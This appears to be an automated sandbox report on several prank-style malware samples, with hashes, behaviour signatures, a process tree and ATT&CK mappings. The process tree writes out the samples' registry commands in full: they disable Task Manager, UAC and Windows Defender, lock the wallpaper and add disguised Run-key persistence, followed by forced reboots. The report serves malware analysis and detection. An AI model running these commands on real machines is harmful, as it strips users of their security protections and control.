Analysis
- max time kernel: 11s
- max time network: 14s
- platform: windows11-21h2_x64
- resource: win11-20241007-en
- resource tags: arch:x64, arch:x86, image:win11-20241007-en, locale:en-us, os:windows11-21h2-x64, system
- submitted: 08-11-2024 14:13
Behavioral tasks
- behavioral1: Sample Dest/HorrorBob2.exe, Resource win11-20241007-en
- behavioral2: Sample Dest/HorrorRansom 1.0 Final.exe, Resource win11-20241007-en
- behavioral3: Sample Dest/HorrorTrojan Ultimate Edition.exe, Resource win11-20241007-en
- behavioral4: Sample Dest/HorrorTrojan123.exe, Resource win11-20241007-en
- behavioral5: Sample Dest/Start.bat, Resource win11-20241007-en
- behavioral6: Sample Dest/covid20.exe, Resource win11-20241007-en
Errors
General
- Target: Dest/Start.bat
- Size: 59B
- MD5: e802087cce5e0317e5badc64380d207b
- SHA1: 64e1f2a59da7caf0f1c206464724863db8829aaf
- SHA256: c72166dd069087612430540b67d4771bae3899e9d928b587ca8ac24dd458c2e3
- SHA512: e82a80520f5a9119bb45ce83a327f99dafc60c7b97b7754ac2ffdcbbea02c027a85f639f525da4ba869ae36837832d95eb846fd6c17304a749d094185691f406
Malware Config
Signatures
- UAC bypass
  Processes (description / ioc / process):
  - Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (reg.exe)
  - Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (reg.exe)
- Disables Task Manager via registry modification
- Unnamed signature (YARA matches, resource / yara_rule):
  - C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\flasher.exe: aspack_v212_v242
- Executes dropped EXE (2 IoCs)
  Processes (pid / process):
  - 752 CLWCP.exe
  - 4088 flasher.exe
- Adds Run key to start application (2 TTPs, 2 IoCs)
  Processes (description / ioc / process):
  - Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\death666 = "C:\\HostFile.exe" (reg.exe)
  - Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Acer NitroSense Update = "C:\\Service64\\Service64.exe" (reg.exe)
- Sets desktop wallpaper using registry (2 TTPs, 3 IoCs)
  Processes (description / ioc / process):
  - Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Control Panel\Desktop\Wallpaper = "c:\\note.bmp" (reg.exe)
  - Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Control Panel\Desktop\Wallpaper = "c:\\covid20\\bg.bmp" (CLWCP.exe)
  - Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000\Control Panel\Desktop\Wallpaper = "c:\\Service64\\blood.bmp" (reg.exe)
- Unnamed signature (YARA matches, resource / yara_rule):
  - behavioral5/memory/4780-0-0x0000000000400000-0x0000000001A7B000-memory.dmp: upx
  - behavioral5/memory/2116-1-0x0000000000400000-0x0000000000A12000-memory.dmp: upx
  - behavioral5/memory/5032-2-0x0000000000400000-0x000000000132F000-memory.dmp: upx
  - C:\Users\Admin\AppData\Local\Temp\C18B.tmp\HostFile.exe: upx
  - behavioral5/memory/4780-79-0x0000000000400000-0x0000000001A7B000-memory.dmp: upx
  - behavioral5/memory/2116-81-0x0000000000400000-0x0000000000A12000-memory.dmp: upx
  - behavioral5/memory/5032-76-0x0000000000400000-0x000000000132F000-memory.dmp: upx
  - C:\Users\Admin\AppData\Local\Temp\C498.tmp\Service64.exe: upx
- Drops file in Windows directory (1 IoC)
  Processes (description / ioc / process):
  - File created C:\Windows\rescache\_merged\425634766\3423304070.pri (LogonUI.exe)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- System Location Discovery: System Language Discovery (1 TTP, 27 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Processes (description / ioc / process):
  - Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language, by the following processes in order: HorrorTrojan Ultimate Edition.exe, reg.exe, HorrorRansom 1.0 Final.exe, HorrorTrojan123.exe, shutdown.exe, reg.exe, rundll32.exe, reg.exe, covid20.exe, HorrorBob2.exe, reg.exe, flasher.exe, cmd.exe, reg.exe, net.exe, reg.exe, reg.exe, reg.exe, reg.exe, reg.exe, reg.exe, cmd.exe, CLWCP.exe, WScript.exe, cmd.exe, reg.exe, net1.exe
- Modifies data under HKEY_USERS (15 IoCs)
  Processes (description / ioc), all by LogonUI.exe:
  - Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"
  - Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432"
  - Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268"
  - Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"
  - Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent
  - Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00
  - Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360"
  - Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268"
  - Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"
  - Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History
  - Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM
  - Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432"
  - Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "55"
  - Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"
  - Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"
- Modifies registry class (1 IoC)
  Processes (description / ioc / process):
  - Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings (cmd.exe)
- Modifies registry key (1 TTP, 6 IoCs)
  Processes (pid / process):
  - 3184 reg.exe
  - 3096 reg.exe
  - 3680 reg.exe
  - 5052 reg.exe
  - 3356 reg.exe
  - 4764 reg.exe
- Runs net.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes (description / pid / process):
  - Token: SeShutdownPrivilege, 3152 shutdown.exe
  - Token: SeRemoteShutdownPrivilege, 3152 shutdown.exe
- Suspicious use of SetWindowsHookEx (4 IoCs)
  Processes (pid / process):
  - 1724 HorrorTrojan123.exe
  - 1724 HorrorTrojan123.exe
  - 2552 LogonUI.exe
  - 2552 LogonUI.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (description / pid / process / target process); consecutive identical entries are collapsed with their count:
  - PID 2072 wrote to memory of 4780 (cmd.exe -> covid20.exe) x3
  - PID 2072 wrote to memory of 5032 (cmd.exe -> HorrorBob2.exe) x3
  - PID 2072 wrote to memory of 2116 (cmd.exe -> HorrorRansom 1.0 Final.exe) x3
  - PID 2072 wrote to memory of 1516 (cmd.exe -> HorrorTrojan Ultimate Edition.exe) x3
  - PID 2072 wrote to memory of 1724 (cmd.exe -> HorrorTrojan123.exe) x3
  - PID 2116 wrote to memory of 3408 (HorrorRansom 1.0 Final.exe -> cmd.exe) x3
  - PID 4780 wrote to memory of 572 (covid20.exe -> DllHost.exe) x3
  - PID 3408 wrote to memory of 3184 (cmd.exe -> reg.exe) x3
  - PID 1516 wrote to memory of 4332 (HorrorTrojan Ultimate Edition.exe -> wscript.exe) x2
  - PID 3408 wrote to memory of 1420 (cmd.exe -> reg.exe) x3
  - PID 3408 wrote to memory of 3680 (cmd.exe -> reg.exe) x3
  - PID 3408 wrote to memory of 3096 (cmd.exe -> reg.exe) x3
  - PID 572 wrote to memory of 752 (cmd.exe -> CLWCP.exe) x3
  - PID 3408 wrote to memory of 1672 (cmd.exe -> reg.exe) x3
  - PID 572 wrote to memory of 4088 (cmd.exe -> flasher.exe) x3
  - PID 3408 wrote to memory of 4364 (cmd.exe -> reg.exe) x3
  - PID 572 wrote to memory of 2108 (cmd.exe -> WScript.exe) x3
  - PID 3408 wrote to memory of 3152 (cmd.exe -> DllHost.exe) x3
  - PID 5032 wrote to memory of 828 (HorrorBob2.exe -> cmd.exe) x3
  - PID 828 wrote to memory of 1876 (cmd.exe -> DllHost.exe) x3
  - PID 828 wrote to memory of 5052 (cmd.exe -> reg.exe) x3
  - PID 828 wrote to memory of 4156 (cmd.exe -> DllHost.exe) x2
Processes (tree; the bracketed number is the depth in the process tree)
[1] C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Dest\Start.bat"
    PID: 2072
    Signatures: Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\Dest\covid20.exe
      Command line: "covid20.exe"
      PID: 4780
      Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\covid.bat" "
        PID: 572
        Signatures: System Location Discovery: System Language Discovery; Modifies registry class; Suspicious use of WriteProcessMemory
      [4] C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\CLWCP.exe
          Command line: clwcp c:\covid20\bg.bmp
          PID: 752
          Signatures: Executes dropped EXE; Sets desktop wallpaper using registry; System Location Discovery: System Language Discovery
      [4] C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\flasher.exe
          Command line: flasher 5 c:\covid20\covid.bmp
          PID: 4088
          Signatures: Executes dropped EXE; System Location Discovery: System Language Discovery
      [4] C:\Windows\SysWOW64\WScript.exe
          Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\BEFA.tmp\corona.vbs"
          PID: 2108
          Signatures: System Location Discovery: System Language Discovery
  [2] C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe
      Command line: "HorrorBob2.exe"
      PID: 5032
      Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C498.tmp\HorrorBob2.bat" "
        PID: 828
        Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\cscript.exe
          Command line: cscript prompt.vbs
          PID: 1876
      [4] C:\Windows\SysWOW64\reg.exe
          Command line: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
          PID: 5052
          Signatures: System Location Discovery: System Language Discovery; Modifies registry key
      [4] C:\Windows\SysWOW64\reg.exe
          Command line: reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\Service64\blood.bmp /f
          PID: 4156
          Signatures: Sets desktop wallpaper using registry; System Location Discovery: System Language Discovery
      [4] C:\Windows\SysWOW64\rundll32.exe
          Command line: RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
          PID: 1368
          Signatures: System Location Discovery: System Language Discovery
      [4] C:\Windows\SysWOW64\reg.exe
          Command line: reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
          PID: 3356
          Signatures: System Location Discovery: System Language Discovery; Modifies registry key
      [4] C:\Windows\SysWOW64\reg.exe
          Command line: Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
          PID: 3468
          Signatures: System Location Discovery: System Language Discovery
      [4] C:\Windows\SysWOW64\reg.exe
          Command line: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          PID: 4764
          Signatures: UAC bypass; System Location Discovery: System Language Discovery; Modifies registry key
      [4] C:\Windows\SysWOW64\reg.exe
          Command line: REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Acer NitroSense Update" /t REG_SZ /F /D "C:\Service64\Service64.exe"
          PID: 3344
          Signatures: Adds Run key to start application; System Location Discovery: System Language Discovery
      [4] C:\Windows\SysWOW64\net.exe
          Command line: net user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"
          PID: 2644
          Signatures: System Location Discovery: System Language Discovery
        [5] C:\Windows\SysWOW64\net1.exe
            Command line: C:\Windows\system32\net1 user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"
            PID: 3352
            Signatures: System Location Discovery: System Language Discovery
      [4] C:\Windows\SysWOW64\shutdown.exe
          Command line: shutdown /r /t 00
          PID: 756
  [2] C:\Users\Admin\AppData\Local\Temp\Dest\HorrorRansom 1.0 Final.exe
      Command line: "HorrorRansom 1.0 Final.exe"
      PID: 2116
      Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C18B.tmp\BobuxGen.cmd""
        PID: 3408
        Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\reg.exe
          Command line: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
          PID: 3184
          Signatures: System Location Discovery: System Language Discovery; Modifies registry key
      [4] C:\Windows\SysWOW64\reg.exe
          Command line: reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\note.bmp /f
          PID: 1420
          Signatures: Sets desktop wallpaper using registry; System Location Discovery: System Language Discovery
      [4] C:\Windows\SysWOW64\reg.exe
          Command line: reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
          PID: 3680
          Signatures: System Location Discovery: System Language Discovery; Modifies registry key
      [4] C:\Windows\SysWOW64\reg.exe
          Command line: reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          PID: 3096
          Signatures: UAC bypass; System Location Discovery: System Language Discovery; Modifies registry key
      [4] C:\Windows\SysWOW64\reg.exe
          Command line: Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
          PID: 1672
          Signatures: System Location Discovery: System Language Discovery
      [4] C:\Windows\SysWOW64\reg.exe
          Command line: REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "death666" /t REG_SZ /F /D "C:\HostFile.exe"
          PID: 4364
          Signatures: Adds Run key to start application; System Location Discovery: System Language Discovery
      [4] C:\Windows\SysWOW64\shutdown.exe
          Command line: shutdown /r /t 00
          PID: 3152
          Signatures: System Location Discovery: System Language Discovery; Suspicious use of AdjustPrivilegeToken
  [2] C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan Ultimate Edition.exe
      Command line: "HorrorTrojan Ultimate Edition.exe"
      PID: 1516
      Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\wscript.exe
        Command line: "C:\Windows\sysnative\wscript.exe" C:\Users\Admin\AppData\Local\Temp\BEBC.tmp\BEBD.tmp\BEBE.vbs //Nologo
        PID: 4332
  [2] C:\Users\Admin\AppData\Local\Temp\Dest\HorrorTrojan123.exe
      Command line: "HorrorTrojan123.exe"
      PID: 1724
      Signatures: System Location Discovery: System Language Discovery; Suspicious use of SetWindowsHookEx
[1] C:\Windows\system32\LogonUI.exe
    Command line: "LogonUI.exe" /flags:0x4 /state0:0xa3a06855 /state1:0x41c64e6d
    PID: 2552
    Signatures: Drops file in Windows directory; Modifies data under HKEY_USERS; Suspicious use of SetWindowsHookEx
[1] C:\Windows\system32\DllHost.exe
    Command line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
    PID: 3152
[1] C:\Windows\system32\DllHost.exe
    Command line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
    PID: 1876
[1] C:\Windows\system32\DllHost.exe
    Command line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
    PID: 4156
[1] C:\Windows\system32\DllHost.exe
    Command line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
    PID: 756
[1] C:\Windows\system32\DllHost.exe
    Command line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
    PID: 572
Network
MITRE ATT&CK Enterprise v15
- Privilege Escalation
  - Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
  - Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Defense Evasion
  - Abuse Elevation Control Mechanism (1): Bypass User Account Control (1)
  - Impair Defenses (1): Disable or Modify Tools (1)
  - Modify Registry (4)
Downloads